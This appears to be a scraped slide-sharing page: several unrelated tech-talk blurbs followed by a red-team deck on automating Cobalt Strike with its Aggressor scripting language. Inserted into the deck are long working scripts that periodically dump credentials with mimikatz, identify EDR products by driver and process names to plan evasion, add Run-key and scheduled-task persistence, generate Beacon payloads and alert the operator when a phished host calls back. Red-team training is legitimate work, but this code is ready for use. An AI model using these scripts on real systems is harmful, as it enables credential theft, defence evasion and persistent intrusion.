Key insights include the importance of automation, making the adoption process seamless, and leveraging offline interactions for marketing. The presentation also emphasizes the need for continuous small improvements and building a friendly, inclusive community that contributes to the project's growth.
Vladimir Iglovikov brings his extensive experience as a Kaggle Grandmaster, ex-Staff ML Engineer at Lyft, sharing valuable lessons and practical advice for anyone looking to enhance the adoption of their open-source projects.
Explore more about Albumentations and join the community at:
GitHub: https://github.com/albumentations-team/albumentations
Website: https://albumentations.ai/
LinkedIn: https://www.linkedin.com/company/100504475
Twitter: https://x.com/albumentations
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024 (Neo4j)
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs (Alex Pruden)
This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor... (SOFTTECHHUB)
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Climate Impact of Software Testing at Nordic Testing Days (Kari Kakkonen)
My slides at Nordic Testing Days 6.6.2024
The talk discusses the climate impact and sustainability of software testing. ICT and testing must carry their part of the global responsibility to help with climate warming. We can minimize the carbon footprint, but we can also have a carbon handprint, a positive impact on the climate. Sustainability can be added to the quality characteristics and then measured continuously. Test environments can be used less, at a smaller scale and on demand. Test techniques can be used to optimize or minimize the number of tests. Test automation can be used to speed up testing.
Epistemic Interaction - tuning interfaces to provide information for AI support (Alan Dix)
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
UiPath Test Automation using UiPath Test Suite series, part 6 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor... (Neo4j)
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
UiPath Test Automation using UiPath Test Suite series, part 5 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD within UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024 (Albert Hoitingh)
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Full-RAG: A modern architecture for hyper-personalization (Zilliz)
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
GridMate - End to end testing is a critical piece to ensure quality and avoid... (ThomasParaiso2)
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -... (DanBrown980551)
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ... (James Anderson)
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
2. #whoami
@ChrisTruncer
▸ Sys admin turned red teamer
▸ Florida State Seminole
▸ Co-Founder and Red Team Lead of FortyNorth Security
▸ Open Source Developer
▹ Veil-Framework
▹ WMImplant
▹ EyeWitness
▹ ...and more
3. #whoami
@r3dQu1nn
▸ Sys/Net Admin turned Red Teamer/Pen Tester
▸ Previous:
▹ IT in the Navy for 9 years
▹ Navy Red Team Technical Lead
▸ Current:
▹ Red Team Security Consultant for Mandiant
▹ PowerShell Reverse Engineer
▸ Glorified Script Kiddie/Noobie
▹ https://github.com/harleyQu1nn/AggressorScripts
4. What’s This Talk About?
▸ Automation
▸ Aggressor
▹ Event driven language
▸ Events that we might care about
▸ Assessment/Attack lifecycle
▸ Where can automation help?
▸ Demos
▸ Links
5. This is NOT About…
▸ Automating Red Teams
▸ Automating Pen Testing
▸ There’s something to be said about the human mind analyzing the problem
▹ What if an exploit fails once, but runs the second time?
▹ How does automation account for this?
▹ Can it always identify the root cause?
▸ This isn’t SKYNET for offensive work
7. Automation
▸ Automation is useful for tasks
▹ Tasks that don’t require interaction
▹ Doesn’t need human processing
▸ At some level, we’re lazy
▹ Why manually do something if we can automate it?
▸ Trivial tasks are prime candidates
▹ Don’t require intensive analysis, if any
▸ How long will you have that initial access?
▹ Do you have the right permissions to install persistence?
▹ Can you install persistence fast enough before the victim user logs off?
▹ Automation can help us accomplish these much faster
8. Automation
▸ There are additional benefits beyond letting us sit and watch something do our job
▸ Ensure a uniform process is always followed
▹ You can build out protection mechanisms that keep you from doing something
▸ Prevent user error
▹ Rather than fat fingering a parameter/command, automation can ensure you always run it correctly
9. Automation
▸ How can red teams or pen testers use automation on their tests?
▹ Talk is cheap – what’s an easy way to implement?
▸ Open Source
▹ Metasploit resource scripts are a good option
▸ How do we do it?
▹ We’re a Cobalt Strike shop
▹ Scripts and code we reference/release will use Aggressor
11. Aggressor – What is it?
▸ Aggressor is a scripting language built into Cobalt Strike
▹ Since version 3.0
▸ It is based on the language Sleep
▸ Aggressor lets you automate operator actions, manipulate data, generate reports, etc.
▸ Aggressor isn’t a standard programming language
▹ It’s an event driven language
12. Event Driven Language
▸ This doesn’t generate a compiled binary which you run on a computer
▸ Rather than “starting” a program, your code is triggered when a specific event is encountered
▹ Think similar to WMI events that occur after X happens
▹ Remember IRC Bots?
▸ Aggressor is driven by events that happen while it is running
▹ These are clearly related to actions that occur while compromising a system
13. Aggressor – The Core
▸ Aggressor is based on the language Sleep
▹ http://sleep.dashnine.org/manual/index.html
▸ Sleep is a “java-based scripting language heavily inspired by Perl”
▸ Aggressor is an additional set of exposed functions for extending Cobalt Strike and its associated functionality
▹ Extending can also mean creating automation for your requirements
14. Aggressor – The Core
▸ Aggressor has the ability to interact with Cobalt Strike, Beacons, and data such as:
▹ Running commands within a Beacon, interpreting results, and making a decision
▹ Interacting with downloaded screenshots or keylogged data
▹ Modify sites hosted by Cobalt Strike
▹ Interact with credentials stored on your team server
▹ Develop custom reports for your customers, and more…
16. Aggressor Scripting
▸ Aggressor scripting utilizes different functionality to enable its developers
▸ Events – Aggressor events initiate and run your code when a specific condition occurs
▸ Functions – Allow you to run “checks”, perform an action locally, or run a command within Beacon - this is the mechanism for performing an action
▸ Hooks – Can allow you to generate pop-up menus
▸ The Data Model – These are different data repositories that you can manipulate
17. Aggressor Events
▸ There are triggerable events for almost everything you could wish for with Aggressor
▸ beacon_initial – This monitors for new beacons checking in to your team server
▸ event_join – This event occurs when a new user connects to your team server
▸ heartbeat_* – This event occurs every X seconds or minutes
▸ ssh_initial – As new ssh connections check in, this event will fire
18. Aggressor Events
▸ Remember how your DNS beacons first check in,
but with no data?
▸ beacon_initial_empty – This event triggers
when the team server receives an empty beacon
▸ One of the first things people may do is type
“checkin” and/or set the “mode”
▹ Save yourself the step!
18
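The two events from slides 17 and 18 wired to code, as an added example that is not part of the deck or the AggressorAssessor repository. It assumes the bmode, bcheckin, elog, say and beacons functions and the event argument order from the Aggressor events page; the choice of the dns-txt channel is this example's, not a recommendation from the slides.

```sleep
# Added example (not from the deck): react to an empty DNS Beacon and to a
# new operator joining. Assumes bmode/bcheckin/elog/say/beacons() and the
# event arguments documented on the Aggressor events page.

# A DNS Beacon arrives with no metadata: ask it to check in over the
# preferred channel so nobody has to type "mode dns-txt" and "checkin".
on beacon_initial_empty {
    # $1 = the Beacon ID
    bmode($1, "dns-txt");     # switch the data channel to DNS TXT records
    bcheckin($1);             # force a full checkin so the metadata populates
    elog("Auto-checkin sent to empty Beacon " . $1);
}

# Another operator connected to the team server: greet them with the one
# number everyone asks for first.
on event_join {
    # $1 = the user who joined, $2 = the time
    say("Welcome, " . $1 . ". Beacons currently known: " . size(beacons()));
}
```

Load it with Cobalt Strike > Script Manager; the empty-Beacon handler only fires for sessions that have not yet sent metadata, so HTTP and SMB Beacons are unaffected.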
19. Aggressor Events
▸ Events expose access to different objects depending on the event
▹ beacon_initial – Provides a handle (the Beacon ID, $1) to the individual Beacon checking in
▹ This is how you can have an individual Beacon perform an action
▹ heartbeat_* – Exposes nothing, but you can use a function (beacons()) to iterate over all Beacons
▹ This gives you access to each of them
20. Aggressor Events
▸ There are a large number of events that you can use to trigger your code
▸ Events are available here - https://www.cobaltstrike.com/aggressor-script/events.html
▸ You can’t create your own custom events
▹ This part isn’t user-expandable
▸ However, you can always ask if you can think of a useful trigger
21. Aggressor Functions
▸ Functions are the “code” associated with your Aggressor Script
▸ Functions dictate the actions that you will perform once your trigger is activated
▸ Your code isn’t limited to what you see listed on the Aggressor function page
▸ Aggressor is based on Sleep, right?
▸ Your code will likely be a combination of Aggressor and Sleep
22. Aggressor Functions
▸ Functions include essentially every action that you can conduct within Beacon
▹ bpowershell_import – Imports a PowerShell script into a Beacon
▹ bps – Performs a process listing on the targeted Beacon
▹ blogonpasswords – Runs the mimikatz logonpasswords command
▹ bls – Lists the files in a specific directory
▹ bsetenv – Sets an environment variable in the current Beacon
23. Aggressor Functions
▸ It also includes predicates (“metafunctions”) that you use in conditions and that return results based on Beacon metadata
▹ -is64 – Returns true if the Beacon is running in an x64 process
▹ -isadmin – Returns true if the Beacon is running with admin rights
▹ -isssh – Returns true if the active session is an SSH session
24. Aggressor Functions
▸ You can also interact with Cobalt Strike itself (rather than Beacon) and manipulate data through Aggressor
▹ gzip – Gzip a string
▹ base64_decode – Base64 decode a string
▹ openFileBrowser – Opens the file browser interface for a Beacon
▹ openScreenshotBrowser – Opens the screenshot tab
▹ str_encode – Encodes a string in the specified encoding format
25. Aggressor Sample
▸ Let’s piece some of this together in a sample scenario
▸ You’ve compromised a Windows jump-box used by admins/users
▸ You were able to escalate privileges
▸ You’re interested in capturing passwords from users regularly logging in to the system
▸ How can Aggressor help?
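One answer to “how can Aggressor help?” for this scenario, combining the heartbeat event from slide 19 with the predicates from slide 23. It is an added example, not the deck's own sample script. It assumes the heartbeat_30m event, beacons() and beacon_info() with the computer and last fields, the -isadmin and -is64 predicates and blogonpasswords() as documented; the host name JUMP01 and the 30-minute interval are choices for this example.

```sleep
# Added example (not from the deck): on a compromised jump-box, run mimikatz
# logonpasswords on a timer so credentials of users who log on between your
# manual checks land in the credential model. Cobalt Strike parses the
# logonpasswords output into View -> Credentials on its own.
# Assumptions: heartbeat_30m, beacons()/beacon_info() fields 'computer' and
# 'last', -isadmin/-is64, blogonpasswords(); host name is a placeholder.

global('$target_host');
$target_host = "JUMP01";   # assumed NetBIOS name of the compromised jump-box

# Beacon IDs on the jump-box where logonpasswords can succeed: elevated and
# x64 (an x86 Beacon on a 64-bit host cannot read LSASS cleanly).
sub eligible_beacons {
    local('@out $entry $bid');
    foreach $entry (beacons()) {
        $bid = $entry['id'];
        if (lc($entry['computer']) eq lc($target_host) && -isadmin $bid && -is64 $bid) {
            push(@out, $bid);
        }
    }
    return @out;
}

on heartbeat_30m {
    local('$bid');
    foreach $bid (eligible_beacons()) {
        # Skip sessions that have not checked in for over 30 minutes ('last'
        # is milliseconds since the last checkin) so tasks do not pile up
        # behind a dead Beacon.
        if (beacon_info($bid, "last") > 1800000) { continue; }
        blog($bid, "Automated credential sweep (heartbeat_30m)");
        blogonpasswords($bid);
    }
}
```

Keep eligible_beacons() separate from the event handler: it can be called from the Script Console to confirm the filter selects the session you expect before the timer ever fires.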
35. A Phishing Tale
▸ What’s likely the most prevalent method of gaining access into an environment?
▸ Phishing!
▸ This is a time intensive process
▹ Generally requires developing a scenario for your customer
▹ Writing custom malware for your customer and scenario
▹ Developing domain reputation
▹ Etc.
36. A Phishing Tale
▸ Eventually, you’ve fired your first salvo and have started phishing
▸ If you’re lucky, your first target opens your e-mail and runs your malware
▸ However, this isn’t always the case
▹ It might take a few people
▹ If you’re sending every 15-30 minutes, time adds up
▸ What if you go grab a drink, are watching a different screen, etc.?
▹ Do you see your incoming Beacon?
37. A Phishing Tale
▸ One of the worst feelings can be coming back to your system and seeing you missed a callback
▸ It’s also great to know right when your Beacon arrives
▸ Aggressor can help
▹ Let’s look into the correct trigger
▹ There’s publicly available code that sends text messages via e-mail
▹ Sleep can let us run an existing script
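The trigger plus the external script, as an added example that is not the deck's notifier. It assumes beacon_initial, beacon_info and elog from the Aggressor docs and exec/readAll/closef from Sleep; the notifier path, its command-line flags and the e-mail-to-SMS gateway address are placeholders for whatever mail-sending script you already have.

```sleep
# Added example (not from the deck): text the operator when a phish lands.
# Assumes beacon_initial/beacon_info/elog (Aggressor) and exec()/readAll()/
# closef() (Sleep). Notifier path, its flags and the gateway address are
# assumptions; substitute your own mail-sending script.

global('$notify_cmd $sms_address');
$notify_cmd  = "/opt/tools/sendmail.py";      # assumed: existing mail-sending script
$sms_address = "5555550123@txt.example.com";  # assumed: carrier e-mail-to-SMS gateway

# One-line summary of a Beacon; kept as a function so it can be reused.
sub beacon_summary {
    local('$bid');
    $bid = $1;
    return "New Beacon " . $bid . ": " . beacon_info($bid, "user") . "@" .
           beacon_info($bid, "computer") . " (" . beacon_info($bid, "internal") . ")";
}

on beacon_initial {
    local('$msg $handle @out');
    $msg = beacon_summary($1);
    elog($msg);
    # Run the external notifier from the Cobalt Strike client. Passing an
    # array avoids shell quoting problems with the message text.
    $handle = exec(@("python3", $notify_cmd, "--to", $sms_address, "--body", $msg));
    @out = readAll($handle);
    closef($handle);
    if (size(@out) > 0) { elog("notifier: " . join("\n", @out)); }
}
```

exec() runs on the machine where the script is loaded (the operator's client), so the notifier and its credentials never touch the team server.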
49. Identifying EDR
▸ Now that we’ve been alerted to our Beacon, we might want to recon it
▸ What sort of data are we interested in?
▹ Sky’s the limit
▹ Network Connections/Interfaces
▹ Mapped Drives
▹ Local Admin Rights
▹ Etc.
▸ What about end point protection software/defenses and its settings?
50. Identifying EDR
▸ Most EDR products install minifilter drivers (.sys files)
▸ Installed to %SystemRoot%\System32\drivers or %SystemRoot%\System32\DriverStore\FileRepository
▹ Minifilter altitudes are allocated by Microsoft and are publicly listed
▹ https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/allocated-altitudes
▹ This document associates minifilter driver file names with vendor names
51. Identifying EDR
▸ Why is this important and how can we use this?
▹ If the EDR product has a locally installed driver (rather than relying only on its cloud-based option), we can identify the minifilter driver and match it to the company name
▹ This process can be automated using Aggressor
▹ Gives Red Teamers awareness of what they are up against before executing commands
▸ How can this be automated?
▹ Cobalt Strike's Beacon has a built-in 'ls' command we can use
▹ The built-in 'ls' command uses Win32 APIs to list a directory, so no child process is spawned (more stealthy than 'dir' through cmd.exe or a PowerShell process)
52. Identifying EDR
▸ Does the built-in 'ls' command have documentation?
▹ https://www.cobaltstrike.com/aggressor-script/functions.html#bls
53. Identifying EDR
▸ List out the driver directories and parse the results with conditional statements to determine what EDR is present
▹ Define a static array of .sys files
▹ Store the 'ls' command results in an array
▹ Parse the results array and do exact matching to determine the proper vendor information
▹ Profit
▸ We can also identify other AV products and Admin Tools present using the 'ps' built-in Beacon command and matching on the process name
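The procedure above carried through in one script, as an added example rather than the deck's own EDR script. It assumes bls()/bps(), alias and beacon_command_register, and the beacon_output_ls and beacon_output_ps events with $1 = Beacon ID, $2 = raw output, $3 = time; it also assumes Beacon's raw listing is tab-delimited with the entry name in the fourth column for ls (type, size, modified, name) and in the first column for ps. The driver and process tables are a small constructed subset to extend from Microsoft's allocated-altitudes list and your own notes.

```sleep
# Added example (not the deck's EDR script): match Beacon ls/ps output against
# known driver and process names. Assumes beacon_output_ls/beacon_output_ps
# ($1 bid, $2 raw output, $3 time), tab-delimited output (ls: type, size,
# modified, name; ps: name first), bls/bps, alias, beacon_command_register.
# The vendor tables below are a constructed subset; extend them yourself.

global('%edr_drivers %edr_procs @driver_dirs %edr_seen');
# Driver file base name (lower-case, no extension) -> product
%edr_drivers = %(
    "wdfilter"        => "Microsoft Defender (WdFilter.sys)",
    "csagent"         => "CrowdStrike Falcon (CSAgent.sys)",
    "sentinelmonitor" => "SentinelOne (SentinelMonitor.sys)",
    "cbk7"            => "Carbon Black (cbk7.sys)",
    "edrsensor"       => "Bitdefender EDR (edrsensor.sys)",
    "mfehidk"         => "McAfee (mfehidk.sys)",
    "savonaccess"     => "Sophos (savonaccess.sys)"
);
# Process name (lower-case) -> product, for the ps side
%edr_procs = %(
    "msmpeng.exe"         => "Microsoft Defender",
    "csfalconservice.exe" => "CrowdStrike Falcon",
    "sentinelagent.exe"   => "SentinelOne",
    "cb.exe"              => "Carbon Black"
);
@driver_dirs = @("C:\\Windows\\System32\\drivers",
                 "C:\\Windows\\System32\\DriverStore\\FileRepository");

# An entry matches either the file itself (csagent.sys) or the package folder
# in FileRepository (csagent.inf_amd64_...), hence the "<base>." prefix test.
sub match_drivers {
    local('@hits $line @cols $name $base');
    foreach $line (split("\n", $1)) {
        @cols = split("\t", $line);
        if (size(@cols) < 4) { continue; }
        $name = lc(@cols[3]);
        foreach $base (keys(%edr_drivers)) {
            if (left($name, strlen($base) + 1) eq $base . ".") {
                push(@hits, $name . " -> " . %edr_drivers[$base]);
            }
        }
    }
    return @hits;
}

sub match_processes {
    local('@hits $line @cols $name');
    foreach $line (split("\n", $1)) {
        @cols = split("\t", $line);
        $name = lc(@cols[0]);
        if ($name in %edr_procs) { push(@hits, $name . " -> " . %edr_procs[$name]); }
    }
    return @hits;
}

on beacon_output_ls {
    local('$hit @hits');
    @hits = match_drivers($2);
    foreach $hit (@hits) { blog($1, "EDR driver: " . $hit); }
    if (size(@hits) > 0) { %edr_seen[$1] = @hits; }   # remembered per Beacon
}

on beacon_output_ps {
    local('$hit');
    foreach $hit (match_processes($2)) { blog($1, "Security product process: " . $hit); }
}

# 'edrcheck' Beacon command: list both driver directories, then the processes
alias edrcheck {
    local('$dir');
    foreach $dir (@driver_dirs) { bls($1, $dir); }
    bps($1);
}
beacon_command_register("edrcheck", "Identify EDR/AV from driver and process names",
    "Use: edrcheck\n\nLists the driver directories with Beacon's ls, runs ps, and matches the results against known EDR driver and process names.");
```

The output handlers fire for every ls and ps, not only those issued by edrcheck, so a manual listing of the drivers directory is annotated the same way.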
61. Persisting
▸ We’ve found minimal EDR software, or exclusions which we can exploit to maintain access
▸ Persistence might be the next step we want to take (depending on previous results)
▸ Automating persistence is something we hesitate on doing
▸ Let’s have this be a combination of manual analysis and Aggressor
62. Persisting
▸ There’s a couple different ways to persist depending on the level of access
▹ Registry Key
▹ Scheduled Task
▹ WMI Persistence
▸ Rather than doing this all from the command line, let’s generate a pop-up for ease of use!
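A pop-up that keeps the "manual analysis" part: the operator picks the method and sees the exact command before anything runs. This is an added example, not the deck's persistence script. It assumes the beacon_bottom popup hook ($1 = the selected Beacon IDs), the dialog API (dialog, drow_combobox, drow_text, dbutton_action, dialog_show), brun() and blog(); the default value name and payload path are placeholders. WMI subscription persistence is left as a manual step here because it needs a multi-line PowerShell script rather than one command.

```sleep
# Added example (not from the deck): right-click "Persistence" menu with a
# dialog. Assumes beacon_bottom ($1 = selected Beacon IDs), the dialog API,
# brun() and blog(); the key/task name and payload path are placeholders.

# Build the command for the chosen method. Returning the string rather than
# running it keeps the decision visible and the logic checkable.
sub persist_command {
    local('$method $name $payload');
    ($method, $name, $payload) = @($1, $2, $3);
    if ($method eq "Registry Run key (HKCU)") {
        return 'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' . $name .
               ' /t REG_SZ /d "' . $payload . '" /f';
    }
    else if ($method eq "Scheduled task (at logon)") {
        return 'schtasks /create /f /sc onlogon /tn ' . $name . ' /tr "' . $payload . '"';
    }
    return $null;
}

# Dialog callback: $1 = dialog, $2 = button, $3 = dictionary of values
sub persist_run {
    local('%o $bid $cmd');
    %o = $3;
    $cmd = persist_command(%o['method'], %o['name'], %o['payload']);
    if ($cmd is $null) { show_error("Unsupported method: " . %o['method']); return; }
    foreach $bid (%o['bids']) {
        blog($bid, "Persistence (" . %o['method'] . "): " . $cmd);
        brun($bid, $cmd);   # CreateProcess on reg.exe/schtasks.exe, no cmd.exe in between
    }
}

sub persist_dialog {
    local('$dialog');
    # 'bids' rides along in the dictionary so the callback knows the targets
    $dialog = dialog("Persist", %(bids => $1, method => "Registry Run key (HKCU)",
                     name => "OneDriveUpdate", payload => "C:\\Users\\Public\\update.exe"),
                     &persist_run);
    drow_combobox($dialog, "method", "Method:", @("Registry Run key (HKCU)", "Scheduled task (at logon)"));
    drow_text($dialog, "name", "Value / task name:");
    drow_text($dialog, "payload", "Payload path on target:");
    dbutton_action($dialog, "Persist");
    dialog_show($dialog);
}

popup beacon_bottom {
    menu "Persistence" {
        item "Add persistence..." { persist_dialog($1); }
    }
}
```

Both methods write to the current user's hive or task scheduler, so they work from a non-elevated Beacon; an elevated session could target HKLM or a SYSTEM task with the same dialog.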
79. Generating Payloads
▸ Payload generation is another crucial step in Red Team engagements, and payloads are used for many different reasons
▹ Initial Access
▹ Lateral Movement
▹ Persistence
▹ Obfuscation/Encoding/AWL Bypass
▸ Beneficial for Blue Team as well!
▹ Signature based identifiers/IOCs
▹ Test detection capabilities
▹ Payload sizes/types
80. Generating Payloads
▸ What types of payloads can we generate?
▹ HTTP
▹ HTTPS
▹ SMB
▹ DNS
▸ How do they work and how are they generated?
▹ Staged vs Stageless (the Packages menu marks stageless variants with “(S)”)
▹ Based off listener information, malleable profile, architecture selection (x64/x86)
▹ Attacks -> Packages menu options
81. Generating Payloads
▸ How can we automate payload generation using Aggressor?
▹ Utilize the dialog API with drow_listener
▹ artifact/artifact_stageless functions
https://www.cobaltstrike.com/aggressor-script/functions.html#dialog
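The dialog and the two artifact functions put together, as an added example and not the deck's generator. It assumes the dialog API (dialog, drow_listener, drow_combobox, drow_checkbox, drow_text, dbutton_action, dialog_show), the attacks popup hook, and the artifact()/artifact_stageless() argument order on the 3.x functions page the deck links; Cobalt Strike 4.x renamed these to artifact_stager() and artifact_payload(), so check functions.html for your version. The default output path is a placeholder.

```sleep
# Added example (not from the deck): Attacks menu item that generates a
# payload from a dialog. Assumes the dialog API, the attacks popup hook and
# the artifact()/artifact_stageless() argument order of the 3.x docs (4.x:
# artifact_stager/artifact_payload). Output path is a placeholder.

# Return the artifact bytes for the chosen options. $4 is the "true"/"false"
# string a dialog checkbox hands back.
sub build_artifact {
    local('$listener $type $arch $stageless');
    ($listener, $type, $arch, $stageless) = @($1, $2, $3, $4);
    if ($stageless eq "true") {
        # artifact_stageless(listener, type, x86|x64, proxy config, script)
        return artifact_stageless($listener, $type, $arch, "", $this);
    }
    # staged: the listener's stager; x64 is selected through the dllx64 type
    return artifact($listener, $type);
}

# Dialog callback: $1 = dialog handle, $2 = button, $3 = dictionary of values
sub on_generate {
    local('%o $data $handle');
    %o = $3;
    $data = build_artifact(%o['listener'], %o['type'], %o['arch'], %o['stageless']);
    if (strlen($data) == 0) { show_error("Artifact generation returned nothing"); return; }
    $handle = openf(">" . %o['out']);
    writeb($handle, $data);
    closef($handle);
    show_message("Wrote " . strlen($data) . " bytes to " . %o['out']);
}

sub payload_dialog {
    local('$dialog');
    $dialog = dialog("Generate Payload",
        %(listener => "", type => "exe", arch => "x64", stageless => "true", out => "/tmp/beacon.exe"),
        &on_generate);
    drow_listener($dialog, "listener", "Listener:");
    drow_combobox($dialog, "type", "Output:", @("exe", "dll", "dllx64", "svcexe", "powershell", "raw"));
    drow_combobox($dialog, "arch", "Arch:", @("x86", "x64"));
    drow_checkbox($dialog, "stageless", "Stageless:", "Generate a stageless (S) artifact");
    drow_text($dialog, "out", "Save to:");
    dbutton_action($dialog, "Generate");
    dialog_show($dialog);
}

popup attacks {
    item "Payload Generator..." { payload_dialog(); }
}
```

The same build_artifact() function can be called from a heartbeat or a Beacon alias without the dialog, which is how payload generation gets chained into the lateral-movement and persistence automation.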
88. Lateral Movement
▸ Lateral movement is a vital part of every engagement and can be approached in different ways
▹ What value can we add if we show successful pivoting inside a network?
▹ 9 times out of 10 we need to move laterally to accomplish our objectives
▸ Can we automate this methodology?
▹ How can we use Aggressor Scripts to enhance lateral movement?
89. Lateral Movement
▸ Built-in methods of lateral movement inside of Beacon
▹ wmi
▹ psexec/psexec_psh
▹ winrm
▸ wmi, winrm and psexec_psh run a PowerShell one-liner for the selected listener on the target; psexec instead uploads and starts a service executable
▹ Good for quick and easy lateral movement
▹ Bad for staying stealthy and avoiding the use of PowerShell/PsExec
